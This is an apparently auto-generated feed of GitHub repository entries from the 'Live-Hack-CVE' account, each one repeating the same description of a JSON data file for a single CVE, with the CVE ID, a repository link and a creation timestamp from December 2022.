**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38764](https://github.com/Live-Hack-CVE/CVE-2022-38764) create time: 2022-12-25T19:11:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39801](https://github.com/Live-Hack-CVE/CVE-2022-39801) create time: 2022-12-25T19:11:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39014 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39014](https://github.com/Live-Hack-CVE/CVE-2022-39014) create time: 2022-12-25T19:11:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35298 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35298](https://github.com/Live-Hack-CVE/CVE-2022-35298) create time: 2022-12-25T19:11:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35292 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35292](https://github.com/Live-Hack-CVE/CVE-2022-35292) create time: 2022-12-25T19:11:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32167](https://github.com/Live-Hack-CVE/CVE-2022-32167) create time: 2022-12-25T19:11:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35196 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35196](https://github.com/Live-Hack-CVE/CVE-2022-35196) create time: 2022-12-25T19:11:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37204](https://github.com/Live-Hack-CVE/CVE-2022-37204) create time: 2022-12-25T19:11:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2002-0839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2002-0839](https://github.com/Live-Hack-CVE/CVE-2002-0839) create time: 2022-12-25T17:49:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-0789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-0789](https://github.com/Live-Hack-CVE/CVE-2003-0789) create time: 2022-12-25T17:49:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0809](https://github.com/Live-Hack-CVE/CVE-2004-0809) create time: 2022-12-25T17:49:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0786](https://github.com/Live-Hack-CVE/CVE-2004-0786) create time: 2022-12-25T17:48:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0751 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0751](https://github.com/Live-Hack-CVE/CVE-2004-0751) create time: 2022-12-25T17:48:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0747](https://github.com/Live-Hack-CVE/CVE-2004-0747) create time: 2022-12-25T17:48:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0748 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0748](https://github.com/Live-Hack-CVE/CVE-2004-0748) create time: 2022-12-25T17:48:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2004-0488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2004-0488](https://github.com/Live-Hack-CVE/CVE-2004-0488) create time: 2022-12-25T17:48:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5641](https://github.com/Live-Hack-CVE/CVE-2019-5641) create time: 2022-12-25T17:49:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16792 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16792](https://github.com/Live-Hack-CVE/CVE-2019-16792) create time: 2022-12-25T17:43:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16785](https://github.com/Live-Hack-CVE/CVE-2019-16785) create time: 2022-12-25T17:43:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16786 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16786](https://github.com/Live-Hack-CVE/CVE-2019-16786) create time: 2022-12-25T17:43:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16789](https://github.com/Live-Hack-CVE/CVE-2019-16789) create time: 2022-12-25T17:43:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35505 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35505](https://github.com/Live-Hack-CVE/CVE-2020-35505) create time: 2022-12-25T17:53:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35504 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35504](https://github.com/Live-Hack-CVE/CVE-2020-35504) create time: 2022-12-25T17:53:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25624 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25624](https://github.com/Live-Hack-CVE/CVE-2020-25624) create time: 2022-12-25T17:47:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25625 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25625](https://github.com/Live-Hack-CVE/CVE-2020-25625) create time: 2022-12-25T17:47:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25084 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25084](https://github.com/Live-Hack-CVE/CVE-2020-25084) create time: 2022-12-25T17:47:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27617](https://github.com/Live-Hack-CVE/CVE-2020-27617) create time: 2022-12-25T17:47:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13253](https://github.com/Live-Hack-CVE/CVE-2020-13253) create time: 2022-12-25T17:47:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15859 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15859](https://github.com/Live-Hack-CVE/CVE-2020-15859) create time: 2022-12-25T17:47:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15469 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15469](https://github.com/Live-Hack-CVE/CVE-2020-15469) create time: 2022-12-25T17:47:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25085](https://github.com/Live-Hack-CVE/CVE-2020-25085) create time: 2022-12-25T17:47:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20977 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20977](https://github.com/Live-Hack-CVE/CVE-2020-20977) create time: 2022-12-25T17:46:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22864](https://github.com/Live-Hack-CVE/CVE-2020-22864) create time: 2022-12-25T17:46:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10558](https://github.com/Live-Hack-CVE/CVE-2020-10558) create time: 2022-12-25T17:44:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2312](https://github.com/Live-Hack-CVE/CVE-2021-2312) create time: 2022-12-25T17:54:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2454 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2454](https://github.com/Live-Hack-CVE/CVE-2021-2454) create time: 2022-12-25T17:54:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2280](https://github.com/Live-Hack-CVE/CVE-2021-2280) create time: 2022-12-25T17:54:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2282 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2282](https://github.com/Live-Hack-CVE/CVE-2021-2282) create time: 2022-12-25T17:54:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2281](https://github.com/Live-Hack-CVE/CVE-2021-2281) create time: 2022-12-25T17:54:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2279 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2279](https://github.com/Live-Hack-CVE/CVE-2021-2279) create time: 2022-12-25T17:53:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3929 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3929](https://github.com/Live-Hack-CVE/CVE-2021-3929) create time: 2022-12-25T17:52:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2296](https://github.com/Live-Hack-CVE/CVE-2021-2296) create time: 2022-12-25T17:51:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2297](https://github.com/Live-Hack-CVE/CVE-2021-2297) create time: 2022-12-25T17:51:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2306 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2306](https://github.com/Live-Hack-CVE/CVE-2021-2306) create time: 2022-12-25T17:51:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2287](https://github.com/Live-Hack-CVE/CVE-2021-2287) create time: 2022-12-25T17:51:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2286 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2286](https://github.com/Live-Hack-CVE/CVE-2021-2286) create time: 2022-12-25T17:51:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2291](https://github.com/Live-Hack-CVE/CVE-2021-2291) create time: 2022-12-25T17:51:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2284](https://github.com/Live-Hack-CVE/CVE-2021-2284) create time: 2022-12-25T17:51:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2283](https://github.com/Live-Hack-CVE/CVE-2021-2283) create time: 2022-12-25T17:51:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2285](https://github.com/Live-Hack-CVE/CVE-2021-2285) create time: 2022-12-25T17:51:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2250](https://github.com/Live-Hack-CVE/CVE-2021-2250) create time: 2022-12-25T17:50:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2264](https://github.com/Live-Hack-CVE/CVE-2021-2264) create time: 2022-12-25T17:50:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2145 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2145](https://github.com/Live-Hack-CVE/CVE-2021-2145) create time: 2022-12-25T17:50:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2266](https://github.com/Live-Hack-CVE/CVE-2021-2266) create time: 2022-12-25T17:50:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2163 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2163](https://github.com/Live-Hack-CVE/CVE-2021-2163) create time: 2022-12-25T17:50:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2341](https://github.com/Live-Hack-CVE/CVE-2021-2341) create time: 2022-12-25T17:50:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2388](https://github.com/Live-Hack-CVE/CVE-2021-2388) create time: 2022-12-25T17:50:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2369 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2369](https://github.com/Live-Hack-CVE/CVE-2021-2369) create time: 2022-12-25T17:50:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2161 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2161](https://github.com/Live-Hack-CVE/CVE-2021-2161) create time: 2022-12-25T17:50:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35588](https://github.com/Live-Hack-CVE/CVE-2021-35588) create time: 2022-12-25T17:50:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-2432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-2432](https://github.com/Live-Hack-CVE/CVE-2021-2432) create time: 2022-12-25T17:50:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35550](https://github.com/Live-Hack-CVE/CVE-2021-35550) create time: 2022-12-25T17:50:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35565](https://github.com/Live-Hack-CVE/CVE-2021-35565) create time: 2022-12-25T17:49:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35567 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35567](https://github.com/Live-Hack-CVE/CVE-2021-35567) create time: 2022-12-25T17:49:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36747](https://github.com/Live-Hack-CVE/CVE-2022-36747) create time: 2022-12-25T17:53:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39207](https://github.com/Live-Hack-CVE/CVE-2022-39207) create time: 2022-12-25T17:53:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36386](https://github.com/Live-Hack-CVE/CVE-2022-36386) create time: 2022-12-25T17:53:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3233 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3233](https://github.com/Live-Hack-CVE/CVE-2022-3233) create time: 2022-12-25T17:53:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38073 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38073](https://github.com/Live-Hack-CVE/CVE-2022-38073) create time: 2022-12-25T17:53:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36390 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36390](https://github.com/Live-Hack-CVE/CVE-2022-36390) create time: 2022-12-25T17:53:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40217](https://github.com/Live-Hack-CVE/CVE-2022-40217) create time: 2022-12-25T17:53:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35037](https://github.com/Live-Hack-CVE/CVE-2022-35037) create time: 2022-12-25T17:53:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35036](https://github.com/Live-Hack-CVE/CVE-2022-35036) create time: 2022-12-25T17:53:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35035](https://github.com/Live-Hack-CVE/CVE-2022-35035) create time: 2022-12-25T17:53:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35034](https://github.com/Live-Hack-CVE/CVE-2022-35034) create time: 2022-12-25T17:53:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35032](https://github.com/Live-Hack-CVE/CVE-2022-35032) create time: 2022-12-25T17:52:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35031](https://github.com/Live-Hack-CVE/CVE-2022-35031) create time: 2022-12-25T17:52:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35030 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35030](https://github.com/Live-Hack-CVE/CVE-2022-35030) create time: 2022-12-25T17:52:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35029 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35029](https://github.com/Live-Hack-CVE/CVE-2022-35029) create time: 2022-12-25T17:52:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35028](https://github.com/Live-Hack-CVE/CVE-2022-35028) create time: 2022-12-25T17:52:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35027](https://github.com/Live-Hack-CVE/CVE-2022-35027) create time: 2022-12-25T17:52:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35026](https://github.com/Live-Hack-CVE/CVE-2022-35026) create time: 2022-12-25T17:52:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35025 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35025](https://github.com/Live-Hack-CVE/CVE-2022-35025) create time: 2022-12-25T17:52:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35024 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35024](https://github.com/Live-Hack-CVE/CVE-2022-35024) create time: 2022-12-25T17:52:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35023 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35023](https://github.com/Live-Hack-CVE/CVE-2022-35023) create time: 2022-12-25T17:52:27Z

